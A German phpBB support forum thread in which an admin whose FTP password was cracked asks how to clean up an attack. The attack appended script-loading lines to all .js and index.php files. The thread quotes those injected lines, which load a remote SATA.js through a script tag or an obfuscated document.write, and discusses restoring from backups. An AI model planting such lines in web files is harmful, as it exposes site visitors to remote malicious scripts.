Problem mit FTP

[frein]

hallo,

Ich kann mir folgendes Problem, das bei mir heute aufgetreten ist nicht erklären. Heute morgen gab es bei mir im Forum einen Fehler nach genau dieser Art:
https://www.phpbb.de/kb/headers_already_sent
Ich hab den Fehler wie hier beschrieben bearbeitet.

In der Datei includes/hooks/index.php fand sich in der letzten Zeile der Datei folgendes, was auch verantwortlich war für den Fehler.

Code: Alles auswählen

<script type="text/javascript" src="http://xxx.org/SATA.js"></script>
<!--a444e0b97ecf9c9083aa1f5e7c1d3695-->

Dadurch war der Fehler behoben.
Ich hab dann im FTP nachgeschaut, wann oder wie diese Zeile in der Datei kam und festgestellt, dass heute morgen gegen 4:19 sämtliche Dateien mit der Endung .js diese Änderung:

Code: Alles auswählen

document.write('<s'+'cript type="text/javascript" src="http://xxx.org/SATA.js"></scr'+'ipt>');

und alle Dateien die index.php heißen genau diese Änderung:

Code: Alles auswählen

<script type="text/javascript" src="http://xxx.org/SATA.js"></script>
<!--a444e0b97ecf9c9083aa1f5e7c1d3695-->

In der letzen Zeile erhalten haben.

Wie kommt das und reicht wenn ich das einfach aus jeder Datei wieder entferne?
Vielen Dank schon mal.

[Würzi]

Moin,

ich glaube du hast ein ernsthafteres Problem. Da hat jemand an deinen Dateien rumgepfuscht.

Bitte lesen!!! KB:gehackt

Edit: Ich habe die links zu der Webseite mal geprüft und link entfernt, da dort der Virenscanner anschlägt!

[frein]

danke für den tipp

ich hab jetzt in der Zwischenzeit mit Hilfe des providers festgestellt, wie der Angreifer auf den Server zugreifen konnte. Der Provider hat mich informiert, dass wohl unser FTP Passwort geknackt wurde.
Ich habe jetzt alle Passwörter geändert habe, und laut provider war nicht die Software phpbb oder ein mod von phpbb schuld am Eindringen des Angreifers.

Jetzt ist die Frage ob es weiterhin notwenig ist, wie in Schritt 2 von Mein Forum wurde gecrackt - Was nun? beschrieben, Backups zu ziehen und alles neu zu installieren.

Die Backups hab ich, doch in der Hoffnung auf soeine Situation wie jetzt hab ich noch nichts gelöscht sondern nur offline genommen.

Wär es auch sicher mit geänderten Passwörtern und "reeditierten Dateien" vom Stand vor dem Angriff wieder online zu gehen?


Danke für die Hilfe

[Würzi]

Naja... meine Meinung:

Erstmal schön, daß geklärt ist wie sich der Angreifer Zugriff verschafft hat.

Wichtig natürlich ALLE Passwörter ändern!

Wichtig ist, daß aus allen geänderten Dateien der Schadcode heraus genommen wird!
Neu installieren würde ich persönlich auch nicht machen, ich habe immer ein 1:1 Backup von meinem Forum, so würde ich damit alle Files überschreiben. Du weisst ja nicht, welche Dateien geändert wurden!
Wenn er sich per FTP eingehackt hat, siehst evtl mit deiner FTP Software, wann die jeweiligen Dateien geändert wurden. Ich würde da sehr genau und kleinlichst nachschauen, damit wirklich alle geänderten Dateien auf dem Stand sind vor dem Angriff.

Lieber 5x zuviel geschaut und geprüft als nur 1x zu wenig!!!

Mfg dat Wuerzi

[gn#36]

Aus genau dem Grund halte ich immer eine saubere Forenversion lokal vor, die man einfach drüberbügeln kann, denn wie Würzi schon sagt, man kann nie sicher sein wo überall Änderungen vorgenommen wurden. Problematisch daran ist allerdings, dass mit dem FTP Zugriff auch deine Datenbank geknackt wurde und somit im Prinzip beliebige Informationen in der Datenbank stehen könnten. Dank der Custom BBcodes gibt es auch hier Möglichkeiten, Schadcode unterzubringen, ich weiß auch nicht ob direkt in einem Post in der Datenbank untergebrachter Schadcode vor der Anzeige noch gefiltert wird, die meisten Mechanismen greifen vor dem Eintrag in die Datenbank ein, aber das kann man mit Vollzugriff natürlich umgehen.

[frein]

Aus genau dem Grund halte ich immer eine saubere Forenversion lokal vor, die man einfach drüberbügeln kann, denn wie Würzi schon sagt, man kann nie sicher sein wo überall Änderungen vorgenommen wurden. Problematisch daran ist allerdings, dass mit dem FTP Zugriff auch deine Datenbank geknackt wurde und somit im Prinzip beliebige Informationen in der Datenbank stehen könnten. Dank der Custom BBcodes gibt es auch hier Möglichkeiten, Schadcode unterzubringen, ich weiß auch nicht ob direkt in einem Post in der Datenbank untergebrachter Schadcode vor der Anzeige noch gefiltert wird, die meisten Mechanismen greifen vor dem Eintrag in die Datenbank ein, aber das kann man mit Vollzugriff natürlich umgehen.

Okay das seh ich ein.

Beim FTP hab ich die Möglichkeit sämtliche Dateien die ab dem Angriffszeitpunkt editiert wurden zu öffnen und den Mist wieder rauszulöschen. Ich werd mir wohl auch die Mühe machen nach und nach jede Datei zu überprüfen. Das geht immernoch schneller als alles neu zu machen.

Vor zwei Jahren hab ich alle paar Monate backups der Dateien und wöchentlich von der Datenbank gemacht.
Hätt ich damit nur mal weiter gemacht, hätte sich das heute sicherlich ausgezahlt.
.... Naja

Beim FTP sehe ich ne Lösung, die zwar nur 95% sicher ist, ich geb mir aber alle Mühe gründlich genug zu sein.

Gibt es den ne Möglichkeit die Datenbank aufm server (ohne download) komplett nach diesem Link zu durchsuchen der auch in den Dateien auftaucht.
Es wäre sicherlich realistisch, dass der Angreifer diesen Link, um den es ihm offensichtlich ging, vlt auch in die Datenbank gepackt hat.
Oder übersehe ich da was?

Vielen Dank.